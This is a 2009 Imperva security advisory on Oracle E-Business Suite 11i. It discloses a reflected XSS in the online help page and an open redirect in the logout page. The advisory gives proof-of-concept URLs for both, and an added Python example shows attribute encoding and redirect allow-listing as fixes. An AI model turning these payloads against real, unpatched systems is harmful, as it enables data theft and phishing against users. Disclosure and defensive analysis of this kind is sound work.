Security Advisory: Oracle EBS - XSS and Unchecked Redirection vulnerabilities

January 20, 2009

Background

The Oracle E-Business Suite (EBS) is a collection of business Enterprise Resource Planning, Customer Relationship Management, and Supply Chain Management applications developed by Oracle Corporation. Interaction with the client is achieved through the Apache web server, Java technology (Applets) and several other Oracle technologies. Business data is stored in the Oracle database.

Scope

Imperva’s Application Defense Center is conducting research on various business applications in order to devise better security solutions for them. As part of this research, the team has identified several XSS vulnerabilities and an unchecked redirect vulnerability in Oracle EBS.

Findings

These vulnerabilities can be exploited to steal sensitive data and to carry out phishing attacks. More specifically, data can be stolen from the users of the business suite, whether these are employees of the organization that deploys EBS or partners that access it in self-service mode.

Exploit

Attack vector 1 (XSS):
http://first.imperva:8003/OA_HTML/jsp/fnd/fndhelp.jsp?lang=US&root=FND:LIBRARY&path=paros%22%20style=%22background:url(javascript:alert('Imperva'))
Note that this exploit does not require the use of angle brackets: the injected value closes the surrounding double-quoted attribute and adds a style attribute of its own.

Attack vector 2 (Unchecked Redirection):
http://first.imperva:8003/OA_HTML/AppsLocalLogout.jsp?returnUrl=http://www.imperva.com
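The following is an added defensive example written for this advisory; it is not Oracle's code and not Imperva's. It illustrates the two application-side checks that close the vulnerability classes above: attribute-context output encoding for a reflected parameter (the bracket-free attribute breakout used by vector 1) and allow-list validation of a post-logout redirect target (vector 2). The rendered hidden-field markup, the function names, the default landing path "/" and the decoded sample payload are this example's own assumptions, modelled on the advisory's vectors.

```python
"""Defensive checks for attribute-injection XSS and unchecked redirects.

Added example for this advisory (not vendor code). The hidden-field markup
below is an assumed stand-in for however the JSP reflects the parameter.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the decoded form of the advisory's `path` value.
# It contains no < or >, so a filter that only strips brackets lets it through.
SAMPLE_PATH_PAYLOAD = 'paros" style="background:url(javascript:alert(\'Imperva\'))'

DEFAULT_LANDING = "/"  # assumed safe fallback target after logout


def render_hidden_field(path: str) -> str:
    """Vulnerable form: the parameter is reflected into an attribute verbatim."""
    return f'<input type="hidden" name="path" value="{path}">'


def render_hidden_field_safe(path: str) -> str:
    """Hardened form: attribute-context encoding (quote=True escapes both
    double and single quotes, so the value cannot close the attribute)."""
    return f'<input type="hidden" name="path" value="{html.escape(path, quote=True)}">'


class _AttrCollector(HTMLParser):
    """Collects the attributes the browser-side parser would see on the tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        self.attrs = dict(attrs)


def parsed_attributes(fragment: str) -> dict:
    """Parse a single tag and return its attributes as the HTML parser sees them.
    An unexpected `style` or `on*` attribute means the value broke out."""
    collector = _AttrCollector()
    collector.feed(fragment)
    return collector.attrs


def safe_return_url(return_url: str, default: str = DEFAULT_LANDING) -> str:
    """Allow-list check for a redirect target: accept only a relative path on
    this site; anything with a scheme or host (including protocol-relative
    `//host` and backslash tricks) falls back to the default landing page."""
    parts = urlsplit(return_url)
    if parts.scheme or parts.netloc:
        return default
    if not return_url.startswith("/") or return_url.startswith("//"):
        return default
    if "\\" in return_url:
        return default
    return return_url


if __name__ == "__main__":
    print("vulnerable:", parsed_attributes(render_hidden_field(SAMPLE_PATH_PAYLOAD)))
    print("hardened:  ", parsed_attributes(render_hidden_field_safe(SAMPLE_PATH_PAYLOAD)))
    for candidate in ("http://www.imperva.com", "//www.imperva.com", "/OA_HTML/RF.jsp?x=1"):
        print(candidate, "->", safe_return_url(candidate))
```

Parsing the rendered fragment back with the standard HTML parser is the useful part of the check: on the vulnerable rendering the parser reports an extra `style` attribute, while on the hardened rendering it reports only the three intended attributes and recovers the original value intact. For the redirect, validating against a short list of local relative paths is preferable to trying to block known-bad hosts.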

Version Tested

  • Oracle applications release 11i.

Workaround

Attack vector #1 can be eliminated if the online help system is removed.

Discovered By

Guy Karlebach of Imperva ADC

Vendor Status

Patch available (CPU July 2006)

For comments and suggestions please contact adc@imperva.com

Disclaimer

The information within this advisory is subject to change without notice. Use of this information constitutes acceptance for use in an AS IS condition. Any use of this information is at the user’s own risk. There are no warranties, implied or expressed, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information.

Redistribution of this alert electronically is allowed as long as it is not edited in any way. To reprint this alert, in whole or in part, in any medium other than electronic medium, contact adc@imperva.com for permission.